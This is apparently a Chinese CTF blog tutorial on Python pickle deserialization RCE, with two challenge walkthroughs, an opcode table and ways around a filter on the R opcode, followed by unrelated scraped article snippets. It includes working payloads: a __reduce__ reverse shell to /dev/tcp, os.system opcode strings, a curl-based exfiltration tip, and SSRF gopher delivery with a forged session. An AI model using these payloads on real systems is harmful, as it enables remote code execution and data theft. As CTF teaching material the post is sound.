Elitewa

pickle反序列化RCE分析

pickle反序列化

一. pickle模块
- 1.1 什么是pickle模块
- 1.2 常用函数
- 1.3 魔术方法
二. 例题[[BUUOJ]HFCTF 2021 Final]
- 2.1 题目分析
- 2.2 payload
三. opcode编写
- 3.1 为什么要用到opcode
- 3.2 什么是opcode
- 3.3 常见的指令符
- 3.4 opcode执行原理
- 3.5 R指令被禁绕过
- 3.6 构造示例
- 3.7 一些tips
四. 例题长城杯[seeking]
- 4.1 题目分析
- 4.1 payload
五.总结

一. pickle模块

1.1 什么是pickle模块

pickle模块是Python的标准库之一，用于实现对象的序列化和反序列化。它可以将Python对象转换为字节流（serialization），并在需要时重新恢复（deserialization）成相同的对象。通过pickle模块，你可以将Python对象存储到磁盘或通过网络传输，并在需要时重新加载，以方便数据的保存和传递。pickle模块支持几乎所有的Python数据类型，包括自定义类和对象。

1.2 常用函数

pickle.dump(obj, file, [,protocol])

功能：将obj对象序列化存入已经打开的file中。
参数:
obj：想要序列化的obj对象。
file：文件名称。
protocol：序列化使用的协议。如果该项省略，则默认为0。如果为负值或HIGHEST_PROTOCOL，则使用最高的协议版本。

pickle.load(file)

功能：将file中的对象序列化读出。
参数:
file：文件名称。

CTF中常见的是以下两个函数

pickle.dumps(obj[, protocol])

功能：将obj对象序列化为string形式，而不是存入文件中。
参数:
obj：想要序列化的obj对象。
protocal：如果该项省略，则默认为0。如果为负值或HIGHEST_PROTOCOL，则使用最高的协议版本。

pickle.loads(string)

功能：从string中读出序列化前的obj对象。
参数:
string：文件名称。

1.3 魔术方法

这里这里只介绍与漏洞有关的魔术方法
_reduce_

构造方法，在反序列化的时候自动执行，类似于php中的_wake_

_setstate_

在反序列化时自动执行。它可以在对象从其序列化状态恢复时，对对象进行自定义的状态还原。

二. 例题[[BUUOJ]HFCTF 2021 Final]

2.1 题目分析

#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "*******"

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '__main__':
    app.run('0.0.0.0', port=80, debug=False)

关键代码为以下部分

def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)

这道题没有任何的过滤，直接传入自定义构造方法的User对象，pickle.loads进行反序列化，然后即可实现Rce

2.2 payload

import pickle
from base64 import b64encode
import os

User = type('User', (object,), {
    'uname': 'tyskill',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
    # 添加__reduce__方法RCE
    '__reduce__': lambda o: (os.system, ("bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'",))
    //反序列化时自动调用，反弹shell
})
u = pickle.dumps(User())
print(b64encode(u).decode())

不经base64加密输出为：
这里到下面opcode部分有用

b"\x80\x04\x95<\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x8c\x06system\x93\x8c*bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'\x85R."

三. opcode编写

3.1 为什么要用到opcode

由于单一的__reduce__方法已经被考烂了，现在很多题目都有以下过滤

 if b'R' in code or b'built' in code or b'setstate' in code or b'flag' in code

可以看到过滤了字节R，在序列化（上面例题payload的最后一个字符）的opcode中字节R对应的是__reduce__构造方法，故这种情况无法使用构造方法进行Rce，需要编写opcode

3.2 什么是opcode

Python 的 opcode（operation code）是一组原始指令，用于在 Python 解释器中执行字节码。每个 opcode都是是一个标识符，代表一种特定的操作或指令。
在 Python 中，源代码首先被编译为字节码，然后由解释器逐条执行字节码指令。这些指令以 opcode 的形式存储在字节码对象中，并由Python 解释器按顺序解释和执行。

每个 opcode 都有其特定的功能，用于执行不同的操作，例如变量加载、函数调用、数值运算、控制流程等。Python 提供了大量的
opcode，以支持各种操作和语言特性。

3.3 常见的指令符

opcode	描述	具体写法	栈上的变化	memo上的变化
c	获取一个全局对象或import一个模块（注：会调用import语句，能够引入新的包）	c[module]\n[instance]\n	获得的对象入栈	无
o	寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数（或实例化一个对象）	o	这个过程中涉及到的数据都出栈，函数的返回值（或生成的对象）入栈	无
i	相当于c和o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数（或实例化一个对象）	i[module]\n[callable]\n	这个过程中涉及到的数据都出栈，函数返回值（或生成的对象）入栈	无
N	实例化一个None	N	获得的对象入栈	无
S	实例化一个字符串对象	S'xxx'\n（也可以使用双引号、\'等python字符串形式）	获得的对象入栈	无
V	实例化一个UNICODE字符串对象	Vxxx\n	获得的对象入栈	无
I	实例化一个int对象	Ixxx\n	获得的对象入栈	无
F	实例化一个float对象	Fx.x\n	获得的对象入栈	无
R	选择栈上的第一个对象作为函数、第二个对象作为参数（第二个对象必须为元组），然后调用该函数	R	函数和参数出栈，函数的返回值入栈	无
.	程序结束，栈顶的一个元素作为pickle.loads()的返回值	.	无	无
(	向栈中压入一个MARK标记	(	MARK标记入栈	无
t	寻找栈中的上一个MARK，并组合之间的数据为元组	t	MARK标记以及被组合的数据出栈，获得的对象入栈	无
)	向栈中直接压入一个空元组	)	空元组入栈	无
l	寻找栈中的上一个MARK，并组合之间的数据为列表	l	MARK标记以及被组合的数据出栈，获得的对象入栈	无
]	向栈中直接压入一个空列表	]	空列表入栈	无
d	寻找栈中的上一个MARK，并组合之间的数据为字典（数据必须有偶数个，即呈key-value对）	d	MARK标记以及被组合的数据出栈，获得的对象入栈	无
}	向栈中直接压入一个空字典	}	空字典入栈	无
p	将栈顶对象储存至memo_n	pn\n	无	对象被储存
g	将memo_n的对象压栈	gn\n	对象被压栈	无
0	丢弃栈顶对象	0	栈顶对象被丢弃	无
b	使用栈中的第一个元素（储存多个属性名: 属性值的字典）对第二个元素（对象实例）进行属性设置	b	栈上第一个元素出栈	无
s	将栈的第一个和第二个对象作为key-value对，添加或更新到栈的第三个对象（必须为列表或字典，列表以数字作为key）中	s	第一、二个元素出栈，第三个元素（列表或字典）添加新值或被更新	无
u	寻找栈中的上一个MARK，组合之间的数据（数据必须有偶数个，即呈key-value对）并全部添加或更新到该MARK之前的一个元素（必须为字典）中	u	MARK标记以及被组合的数据出栈，字典被更新	无
a	将栈的第一个元素append到第二个元素(列表)中	a	栈顶元素出栈，第二个元素（列表）被更新	无
e	寻找栈中的上一个MARK，组合之间的数据并extends到该MARK之前的一个元素（必须为列表）中	e	MARK标记以及被组合的数据出栈，列表被更新	无

3.4 opcode执行原理

涉及到出栈入栈，对照上面的指令即可看懂
示例流程图：

3.5 R指令被禁绕过

在R指令被禁用时我们可以使用 o 、i 来进行绕过，这里重点提一下 b
以下是pickle中b指令对应的源码

这里的实现方式也就是上文的注所提到的：如果inst（传入的对象）拥有__setstate__方法，则把state交给__setstate__方法来处理；否则的话，直接把state这个dist的内容，合并到 inst.dict（对象中的属性）里面。

利用思路：如果一个类原先没有__setstate__方法。那么我们利用{‘setstate’: os.system}来BUILE这个对象，那么现在对象的__setstate__就变成了os.system；接下来利用"ls /"来再次BUILD这个对象，则会执行setstate(“ls /”) ，而此时__setstate__已经被我们设置为os.system，因此实现了RCE.

payload如下：

payload = b'\x80\x03c__main__\nExample\n)\x81}(V__setstate__\ncos\nsystem\nubVls /\nb.'

首先用 ) 压入空元组，然后x81用空元组实例化Example对象，然后用 ( 压入MARK，然后压入空字典，用u把{‘setstate’: os.system}压入空字典，然后用b设置对象里的属性为刚才的字典里的属性，然后再次用b传入“ls /”，检测到inst（传入的对象）拥有__setstate__方法，**则把state交给__setstate__方法来处理，即执行
os.system(ls /)

3.6 构造示例

以下从R 、 i 、 o 三个方向构造编写的命令执行的opcode，可以借鉴参考一下

R ：

b'''cos
system
(S'whoami'
tR.'''

i ：

b'''(S'whoami'
ios
system
.'''

o ：

b'''(cos
system
S'whoami'
o.'''

3.7 一些tips

一、其他模块的load也可以触发pickle反序列化漏洞。例如：numpy.load()先尝试以numpy自己的数据格式导入；如果失败，则尝试以pickle的格式导入。因此numpy.load()也可以触发pickle反序列化漏洞。

二、即使代码中没有importos，GLOBAL指令也可以自动导入os.system。因此，不能认为“我不在代码里面导入os库，pickle反序列化的时候就不能执行os.system”。

三、即使没有回显，也可以很方便地调试恶意代码。只需要拥有一台公网服务器，执行os.system('curl your_server/ls / | base64)，然后查询您自己的服务器日志，就能看到结果。这是因为：以`引号包含的代码，在sh中会直接执行，返回其结果。

四. 例题长城杯[seeking]

4.1 题目分析

首页源码


error_reporting(0);
header("HINT:POST n = range(1,10)");

$image = $_GET['image'];
echo "这里什么也没有，或许吧。";
$allow = range(1, 10);
shuffle($allow);
if (($_POST['n'] == $allow[0])) {
    if(isset($image)){
	$image = base64_decode($image);
    	$data = base64_encode(file_get_contents($image));
	echo "your image is".base64_encode($image)."
";
	echo "";
    }else{
	$data = base64_encode(file_get_contents("tupian.png"));
    	echo "no image get,default img is dHVwaWFuLHBuZw==";
	echo "";
    }
}

这里存在一个随机数的比较绕过，网上查了下这个函数没啥漏洞，采取1-10爆破的方法进行绕过

然后我们可以用file或者filter伪协议通过file_get_contents()函数读取文件

根据提示图片中含有信息，并且bash记录中也有信心，在首页图片中分离出一个7Z的压缩包，web题里也有misc

压缩包中含有一个名为 secret.txt的文本文本，打开发现有 M0sT_D4nger0us.php

用file协议读取该php文件内容


$url=$_GET['url'];
$curlobj = curl_init($url);
curl_setopt($curlobj, CURLOPT_HEADER, 0);
curl_exec($curlobj);
?>

发现该题为ssrf

然后根据提示读取secret用户的bash记录

M0sT_D4nger0us.php?url=/home/secret/.bashhistory

发现开启了一个Python的web服务

然后利用file协议读取app.py的内容

M0sT_D4nger0us.php?url=/home/secret/Ez_Pickle/app.py

发现该web服务的地址为 127.0.0.1:5555

#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "idontwantyoutoknowthis"

User = type('User', (object,), {
    'uname': 'xxx',
    '__repr__': lambda o: o.uname,
})

@app.route('/', methods=('GET','POST'))
def index_handler():
    u = pickle.dumps(User())
    session['u'] = u
    return "这里啥都没有，我只知道有个路由的名字和python常用的的一个序列化的包的名字一样哎"


@app.route('/pickle', methods=('GET','POST'))
def pickle_handler():
    try:
        u = session.get('a')
        if isinstance(u, dict):
            code = b64decode(u.get('b'))
            if b'R' in code or b'built' in code or b'setstate' in code or b'flag' in code:
                print(code)
                return "what do you want???"
            result=pickle.loads(code)
            return result
        else:
            return "almost there"
    except:
        return "error"


if __name__ == '__main__':
    app.run('127.0.0.1', port=5555, debug=False)

考点就是pickle反序列化加opcode构造+gopher协议+session伪造

但是存在过滤

if b'R' in code or b'built' in code or b'setstate' in code or b'flag' in code

这就是典型的R指令被禁的情况

4.1 payload

这道题有很多种opcode，任选其一即可

o指令绕过

payload1 = b'''(cos
system
S'cat /f* > /tmp/a'
o.'''

先是用 ( 入栈一个MARK，然后用 c 导入os.system()函数入栈，然后用 S 定义字符串并入栈，最后用 o **寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数，*结果是os.system(cat /f > /tmp/a’o)，点号是结束的意思

2.b指令绕过

payload2 =(c__main__
User
o}(S"\\x5f\\x5f\\x73\\x65\\x74\\x73\\x74\\x61\\x74\\x65\\x5f\\x5f" //__setstate__
cos
system
ubS"cat /ffl14aaaaaaagg>/tmp/gkjzjh146"
b.

这里的原理与文章3.5 R指令绕过原理相同

编写好opcode，然后用脚本加密并gopher发包
加密

import base64
import pickle

payload = b'''(cos
system
S'cat /f* > /tmp/a'
o.'''
# ls / > /tmp/a 得到flag名称
code = payload
payload = base64.b64encode(code)
a = {
    'b': payload
}
session = {}
session['a'] = a
print(session)

然后将结果进行session伪造

gopher发送

import urllib.parse
a ='''GET /pickle HTTP/1.1
Host: 127.0.0.1:5555
Cookie: session=eyJhIjp7ImIiOiJLR052Y3dwemVYTjBaVzBLVXlkallYUWdMMllxSUQ0Z0wzUnRjQzloSndwdkxnPT0ifX0.ZPlszQ.mXPJEIl_a5JbUlHndOy5WOceS2s
'''

tmp = urllib.parse.quote(a)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:5555/' + '_' + new
print(result)

五.总结

作者最近也是从长城杯中接触到的opcode，奈何当时没学，没有解出那道题
opcode刚开始确实挺难看懂的，但是找一个payload然后参照着指令表，慢慢推演琢磨就好了
另外还有 pker(下载链接https://github.com/eddieivan01/pker) 这种编写opcode的脚本，现在还没学，等过几天更新

python的for-in循环小白L. 入门 python numpy 开发语言
‘’‘for-in循环in表达从（字符串序列）中依次取值，又称为遍历for-in遍历的对象必须是可迭代对象for-in的语法结构for自定义的变量in可迭代对象:循环体循环体内不需要访问自定义变量，可以将自定义变量替代为下划线’‘’#第一次取出来的是P，将P赋值item，将item的值输出foritemin'python':print(item)#range（）产生一个整数序列，–》也是一个可迭代
Python-for-in循环難釋懷 python windows 服务器
一、前言在Python编程中，循环结构（LoopStructure）是程序控制流的重要组成部分。其中，for...in循环是Python中最常用、最简洁的迭代工具之一。与传统的C风格语言中的for不同，Python的for...in循环专门用于遍历可迭代对象（Iterable），如列表、元组、字符串、字典、集合，甚至是生成器等。本文将带你深入了解：for...in循环的基本语法；如何高效地遍历各种
【AI 赋能：Python 人工智能应用实战】5. 梯度下降家族：SGD/Adam优化器对比实验与选择策略 AI_DL_CODE 人工智能 python 梯度下降优化器 SGD Adam PyTorch
摘要：本文系统解析梯度下降优化器的核心原理与演进脉络，构建从理论到实战的完整知识体系。理论部分梳理优化器发展里程碑，从1951年的SGD到2018年的AdamW，揭示技术迭代逻辑；通过数学公式对比SGD、Momentum、Adam等核心算法的更新机制，解析动量加速、自适应学习率的创新点。结合损失曲面分析，阐释Momentum如何逃离鞍点、Adam如何处理悬崖梯度。实战模块基于PyTorch在MNI
Python设计模式：适配模式 niuguangshuo python基础 python 设计模式开发语言
1.适配模式（AdapterPattern）详解适配模式（AdapterPattern）是一种结构型设计模式，它允许将一个类的接口转换成客户端所期望的另一种接口。适配模式使得原本由于接口不兼容而无法一起工作的类可以协同工作。换句话说，适配模式充当了一个桥梁，允许不同接口的类之间进行交互。在软件开发中，常常会遇到需要使用现有类的情况，但这些类的接口与我们需要的接口不匹配。适配模式提供了一种解决方案，
使用UV管理PyTorch项目
PyTorch是深度学习研究和开发的流行选择。可以使用uv管理PyTorch项目，包括不同Python版本依赖、管理环境、甚至加速器选择等。安装Pytorch从打包角度来看，PyTorch有几个不常见的特点：许多PyTorchwheel托管在专门的索引上，而非Python包索引（PyPI）。因此，安装PyTorch通常需要配置项目使用PyTorch专属索引。PyTorch为每种加速器生成不同的构建
数字图像处理（三：图像如果当作矩阵，那加减乘除处理了矩阵，那图像咋变）：从LED冬奥会、奥运会及春晚等等大屏，到手机小屏，快来挖一挖里面都有什么
数字图像处理（三）一、（准备工作：咋玩，用什么玩具）图像以矩阵形式存储，那矩阵一变、图像立刻跟着变？1.Python+JupyterNotebook/Lab+库(NumPy,OpenCV,Matplotlib,scikit-image)2.MATLAB+ImageProcessingToolbox3.JavaScript+HTML5Canvas+浏览器4.专业的图像处理软件(带脚本/插件功能)二、
使用Python进行文件属性修改 python自动化工具 python办公自动化 python 服务器 java
哈喽，大家好，我是木头左！在计算机中，文件属性是指与文件相关的元数据，如创建时间、修改时间、访问时间等。这些属性对于管理和组织文件非常重要。Python提供了一些内置的函数和方法，可以方便地修改文件的属性。本文将介绍如何使用Python进行文件属性的修改。1.获取文件属性需要使用os模块中的stat()函数来获取文件的属性。该函数返回一个包含文件属性的命名元组。以下是一个简单的示例：importo
Python 代理模式：控制对象访问的智能中介
在Python编程中，代理模式（ProxyPattern）是一种非常有用的设计模式，它在许多场景下能够为我们提供更加灵活和可控的对象访问方式。代理模式就像是一个中间人，它站在客户端和真实对象之间，代替真实对象处理请求，并且可以在这个过程中添加额外的逻辑，如权限验证、懒加载等。本文将深入探讨Python中的代理模式，详细阐述其概念、关键要点、实现方式、应用场景以及与其他相关模式的比较。一、代理模式的
如何打CTF竞赛？ jieyu1119 安全 web安全网络
一、首先需要认识CTF竞赛1、什么是CTF竞赛？CTF(CaptureTheFlag)一般译作“夺旗赛”，在网络安全领域中指网络安全技术人员之间进行技术竞技的一种比赛形式。[11]通过各种攻击手法，获取服务器后寻找指定的字段，或者文件中某一个固定格式的字段，这个字段叫做Flag，其形式一般为Flag{xxxxxxxX}，提交到裁判机就可以得分。2、竞赛模式解题模式（Jeopardy）在解题模式CT
深度解析股票量化标准，从数据筛选到模型构建全面解读股票程序化交易接口量化交易股票API接口 Python股票量化交易股票量化标准数据筛选模型构建量化分析股票量化接口股票API接口
Python股票接口实现查询账户，提交订单，自动交易（1）Python股票程序交易接口查账，提交订单，自动交易（2）股票量化，Python炒股，CSDN交流社区>>>股票量化标准的定义股票量化标准是一套运用数学和统计学方法，对股票投资进行系统性分析与决策的准则。它将各种影响股票价格的因素，如财务数据、市场交易数据等进行量化处理。通过这些量化后的指标，投资者能更精准地评估股票的价值与潜力，减少主观判
睡岗离岗检测算法 Python 燧机科技SuiJi 人工智能 python 算法深度学习神经网络
睡岗离岗检测算法的核心在于实时监控和智能分析，睡岗离岗检测算法通过安装在关键区域的监控摄像头，系统能够捕捉到员工的活动画面。当系统检测到人体位置长时间未发生变化时，将启动睡姿分类器。该分类器能够识别多种睡姿，如趴在桌子上睡、坐在凳子上后仰睡等。一旦识别为睡姿，系统将立即触发告警机制。这可以通过向管理人员发送警报信号，或通过语音提醒员工的方式实现。睡岗离岗检测算法在多种场景下均有广泛应用。该算法能够
Python桌面版数独（二版）-增加4X4、6X6 香蕉可乐荷包蛋 #数独 python java 前端
增加选择4x4、6x6模式，以下是三种模式的不同解析：4x4模式：数独大小：4x4每个宫格大小：2x2数字范围：1-46x6模式：数独大小：6x6每个宫格大小：2x3数字范围：1-69x9模式：数独大小：9x9每个宫格大小：3x3数字范围：1-9主要优化点：4.添加了模式选择下拉框，可以选择4x4、6x6、9x9模式5.根据选择的模式动态创建不同大小的棋盘6.生成不同大小的数独题目7.验证输入的合
变型桥——桥接模式详解（Python实现）
引言在上一篇文章中，我们详细介绍了适配器模式（AdapterPattern），并展示了如何通过适配器将不兼容的接口转换为兼容的接口，使得原本无法协同工作的类能够在一起工作。这次，我们将探讨另一种结构性设计模式——桥接模式（BridgePattern），或者我们可以亲切地称它为“变型桥”。桥接模式将抽象部分与它的实现部分分离，使它们都可以独立地变化，通过引入一个桥接接口，桥接模式可以让抽象和实现独立
Python适配器模式详解：让不兼容的接口协同工作 detayun Python python 适配器模式开发语言
一、模式定义与核心思想适配器模式（AdapterPattern）是一种结构型设计模式，它通过创建一个中间层（适配器），将不兼容的接口转换为客户端期望的接口。就像现实中的电源适配器，让不同国家的插头都能在同一个插座上工作。二、模式结构解析#目标接口：客户端期望的接口classTarget:defrequest(self):"""标准请求方法"""raiseNotImplementedError#被适
python3.9安装tensorflow-gpu 2.6.0和torch-gpu版本各依赖包的版本对应关系
首先使用的cuDNN（8.1）、CUDA（11.2）、tensorflow-gpu（2.6.0）、python（3.9）之间对应版本Window环境下安装pytorch下载地址tensorflow官网CUDA下载官网cuDNN下载官网注意：cuDNN需要注册absl-py0.15.0astunparse1.6.3cachetools5.3.2certifi2023.7.22charset-norm
打造智能资讯引擎：基于 Python 的新闻数据爬取与个性化推荐系统实战全流程解析程序员威哥最新爬虫实战项目 python 开发语言
前言：数据时代的信息洪流，如何做到“千人千面”？在信息爆炸的时代，每天都有成千上万条新闻资讯涌现。如何从海量内容中挖掘出用户感兴趣的资讯？这不仅仅是爬虫技术的问题，更是数据建模与智能推荐算法的落地挑战。本篇文章将带你从零出发，构建一个具有实际应用价值的“个性化新闻阅读推荐系统”，从数据采集（爬虫）、文本处理（NLP）、兴趣建模（TF-IDF/协同过滤/Embedding）到推荐展示，覆盖整个推荐系
gitlab修改DNS解析配置文件中东大鹅 gitlab linux git
在Linux（CentOS7.9）云服务器上解压gitlab时提示需要Python的环境[root@rainyun-v1vct1josrc]#rpm-ivhgitlab-ce-10.8.4-ce.0.el7.x86_64.rpmwarning:gitlab-ce-10.8.4-ce.0.el7.x86_64.rpm:HeaderV4RSA/SHA1Signature,keyIDf27eab47:N
算法竞赛备考冲刺必刷题（C++） | 洛谷 P1024 一元三次方程求解热爱编程的通信人 c++算法开发语言
本文分享的必刷题目是从蓝桥云课、洛谷、AcWing等知名刷题平台精心挑选而来，并结合各平台提供的算法标签和难度等级进行了系统分类。题目涵盖了从基础到进阶的多种算法和数据结构，旨在为不同阶段的编程学习者提供一条清晰、平稳的学习提升路径。欢迎大家订阅我的专栏：算法题解：C++与Python实现！附上汇总贴：
Python FastAPI 与传统 Web 框架的性能对比 Python编程之道 python fastapi 前端 ai
PythonFastAPI与传统Web框架的性能对比关键词：FastAPI、性能对比、Web框架、异步编程、Python、Django、Flask摘要：本文深入探讨了FastAPI与传统PythonWeb框架（如Django和Flask）在性能方面的差异。我们将从架构设计、请求处理模型、并发能力等多个维度进行对比分析，并通过基准测试数据展示实际性能差异。文章还将提供代码示例和性能优化建议，帮助开发
Python Django 数据库索引优化 Python编程之道 python django 数据库 ai
PythonDjango数据库索引优化关键词：DjangoORM、数据库索引、查询优化、性能调优、PostgreSQL、MySQL、执行计划摘要：本文深入探讨Django框架中的数据库索引优化策略。我们将从数据库索引的基本原理出发，详细分析DjangoORM如何生成SQL查询，以及如何通过合理的索引设计提升查询性能。文章包含索引类型选择、复合索引优化、Django模型字段索引配置、查询集优化技巧等
Python Scrapy爬取办公用品网站数据的策略 Python编程之道 python scrapy 开发语言 ai
1.引入与连接想象一下，你是一家办公用品公司的市场调研人员，需要了解竞争对手的产品价格、种类等信息。如果手动去各个办公用品网站收集这些数据，那将是一项极其繁琐且耗时的工作。而Python的Scrapy框架就像是一个不知疲倦的超级助手，能帮你快速、高效地从众多网站抓取所需数据。你可能已经对Python有了一定的了解，知道它是一门功能强大且应用广泛的编程语言。Scrapy则是Python中专门用于网络
使用Python Scrapy打造个性化爬虫
使用PythonScrapy打造个性化爬虫——知识金字塔构建1.引入与连接：从“手动复制”到“自动化采集”的跨越你是否遇到过这样的场景？想整理1000条知乎优质回答做数据分析，却要逐条复制；想追踪某电商平台的商品价格波动，却要每天手动刷新页面……这些重复劳动，正是“个性化爬虫”的用武之地！与已有知识的连接：你可能用过requests+BeautifulSoup写过简单爬虫，但面对大规模数据、复杂反
新手向:基于 Python 的简易视频剪辑工具
在数字媒体时代，视频创作已成为大众表达的重要形式，从个人vlog制作到企业宣传视频，视频内容的需求呈现爆发式增长。传统专业软件如AdobePremierePro虽功能强大，提供完整的非线性编辑系统，但存在学习曲线陡峭（新手通常需要数周系统学习）、资源占用高（最低配置要求8GB内存）、授权费用昂贵（订阅价约20美元/月）等痛点。相比之下，Python凭借其丰富的多媒体库生态系统（如OpenCV、Mo
TensorFlow GPU 2.10.1 for Python 3.9快速安装指南疑样
本文还有配套的精品资源，点击获取简介：TensorFlowGPU2.10.1是专为Windowsx64和Python3.9设计的TensorFlow版本，它集成了GPU支持以加快深度学习模型的训练。本指南提供了该版本的概述、安装步骤及注意事项，旨在帮助开发者利用其性能优势提升机器学习项目的效率。1.TensorFlowGPU介绍1.1TensorFlow的起源与功能TensorFlow是由Goog
进阶向:基于Python的智能客服系统设计与实现
智能客服系统开发指南系统概述智能客服系统是人工智能领域的重要应用，它通过自然语言处理(NLP)和机器学习技术自动化处理用户查询，显著提升客户服务效率和响应速度。基于Python的实现方案因其丰富的生态系统（如NLTK、spaCy、Transformers等库）、跨平台兼容性以及易于集成的特点，成为开发智能客服系统的首选。系统架构系统核心包括两个主要功能模块：1.API集成模块负责连接各类外部服务，
Python 数据插值：NumPy 实现多种插值方法
Python数据插值：用NumPy解锁缺失数据的秘密拼图关键词数据插值、NumPy、线性插值、多项式插值、缺失值处理、数据平滑、数值分析摘要在数据分析和科学计算中，我们经常遇到离散或缺失的观测数据——比如气象站每小时记录的温度值有缺失，或者实验中只采集了稀疏的采样点。这时候，数据插值（Interpolation）就像“数据修复师”，能根据已知点推断出未知点的数值，让离散数据变成连续的“故事”。本文
【Python LeetCode 专题】热题 100，重在思路一杯水果茶！人生苦短我用 Python python leetcode
哈希1.两数之和49.字母异位词分组128.最长连续序列双指针283.移动零11.盛最多水的容器15.三数之和42.接雨水滑动窗口3.无重复字符的最长子串438.找到字符串中所有字母异位词子串560.和为K的子数组239.滑动窗口最大值普通数组53.最大子数组和56.合并区间189.轮转数组238.除自身以外数组的乘积矩阵73.矩阵置零链表160.相交链表206.反转链表234.回文链表141.环
自己开发FT4222上位机软件 - USB转SPI EE工程师嵌入式系统 python 单片机模块测试
写作背景最近公司有个项目，让开发一个能够同时进行千兆网接收和SPI配置的上位机软件，开发语言不限，所以作者选择Python+PyQt作开发，做嵌入式固件开发的读者可能知道还需要一块USB转SPI的模块才能进行上下位机正常SPI读写，项目团队成员建议模块从淘宝网购买就好，作者经过调研对比，感觉从芯片质量到开发配套上来讲，FTDI的FT4222模块是最优选择。但令作者感到不快的是淘宝商家不提供模块
自己开发I2C Bootloader -上位机开发篇 EE工程师嵌入式系统 python stm32 单片机
上位机脚本开发在芯片原厂大部分工程师选择的脚本语言依然是Python,Python有哪些开发优势这里就不再讨论了，这里我们只陈述一下上位机的开发环境，作者的开发环境是VSCode+Anaconda。脚本内容也没有什么好说的，一看就懂，比较简单。唯一值得提醒的是本项目的上位机开发需要多注意*Write_DataBytes_To_Serial_Port(self,DataBytes):*函数的实现
Grok网站的后端语言是php和Python2.7 言之。随笔随笔
老马的Grok模型https://grok.com/#subscribephp语法这里还出现了两个bug后端语言能看到是php和python2.7要说卷还是得看中国的程序员啊，天天就是新技术，赶不上别人就35岁毕业退休
Spring的注解积累 yijiesuifeng spring 注解
用注解来向Spring容器注册Bean。需要在applicationContext.xml中注册： <context:component-scan base-package=”pagkage1[,pagkage2,…,pagkageN]”/>。如：在base-package指明一个包 <context:component-sc
传感器百合不是茶 android 传感器
android传感器的作用主要就是来获取数据,根据得到的数据来触发某种事件下面就以重力传感器为例; 1,在onCreate中获得传感器服务 private SensorManager sm;// 获得系统的服务 private Sensor sensor;// 创建传感器实例 @Override protected void
[光磁与探测]金吕玉衣的意义 comsci
这是一个古代人的秘密:现在告诉大家信不信由你们: 穿上金律玉衣的人,如果处于灵魂出窍的状态,可以飞到宇宙中去看星星这就是为什么古代
精简的反序打印某个数沐刃青蛟打印
以前看到一些让求反序打印某个数的程序。比如：输入123，输出321。记得以前是告诉你是几位数的，当时就抓耳挠腮，完全没有思路。似乎最后是用到%和/方法解决的。而今突然想到一个简短的方法，就可以实现任意位数的反序打印（但是如果是首位数或者尾位数为0时就没有打印出来了）代码如下： long num, num1=0;
PHP：6种方法获取文件的扩展名 IT独行者 PHP 扩展名
PHP：6种方法获取文件的扩展名 1、字符串查找和截取的方法 1 $extension = substr ( strrchr ( $file , '.' ), 1); 2、字符串查找和截取的方法二 1 $extension = substr
面试111 文强chu 面试
1事务隔离级别有那些，事务特性是什么（问到一次） 2 spring aop 如何管理事务的，如何实现的。动态代理如何实现，jdk怎么实现动态代理的，ioc是怎么实现的，spring是单例还是多例，有那些初始化bean的方式，各有什么区别（经常问） 3 struts默认提供了那些拦截器（一次） 4 过滤器和拦截器的区别（频率也挺高） 5 final，finally final
XML的四种解析方式小桔子 dom jdom dom4j sax
在平时工作中，难免会遇到把 XML 作为数据存储格式。面对目前种类繁多的解决方案，哪个最适合我们呢？在这篇文章中，我对这四种主流方案做一个不完全评测，仅仅针对遍历 XML 这块来测试，因为遍历 XML 是工作中使用最多的（至少我认为）。　　预备　　测试环境：　　AMD 毒龙1.4G OC 1.5G、256M DDR333、Windows2000 Server
wordpress中常见的操作 aichenglong 中文注册 wordpress 移除菜单
1 wordpress中使用中文名注册解决办法 1)使用插件 2)修改wp源代码进入到wp-include/formatting.php文件中找到 function sanitize_user( $username, $strict = false
小飞飞学管理-1 alafqq 管理
项目管理的下午题，其实就在提出问题（挑刺），分析问题，解决问题。今天我随意看下10年上半年的第一题。主要就是项目经理的提拨和培养。结合我自己经历写下心得对于公司选拔和培养项目经理的制度有什么毛病呢？ 1，公司考察，选拔项目经理，只关注技术能力，而很少或没有关注管理方面的经验，能力。 2，公司对项目经理缺乏必要的项目管理知识和技能方面的培训。 3，公司对项目经理的工作缺乏进行指
IO输入输出部分探讨百合不是茶 IO
//文件处理在处理文件输入输出时要引入java.IO这个包； /* 1，运用File类对文件目录和属性进行操作 2，理解流，理解输入输出流的概念 3，使用字节/符流对文件进行读/写操作 4，了解标准的I/O 5，了解对象序列化 */ //1，运用File类对文件目录和属性进行操作 //在工程中线创建一个text.txt
getElementById的用法 bijian1013 element
getElementById是通过Id来设置/返回HTML标签的属性及调用其事件与方法。用这个方法基本上可以控制页面所有标签，条件很简单，就是给每个标签分配一个ID号。返回具有指定ID属性值的第一个对象的一个引用。语法： &n
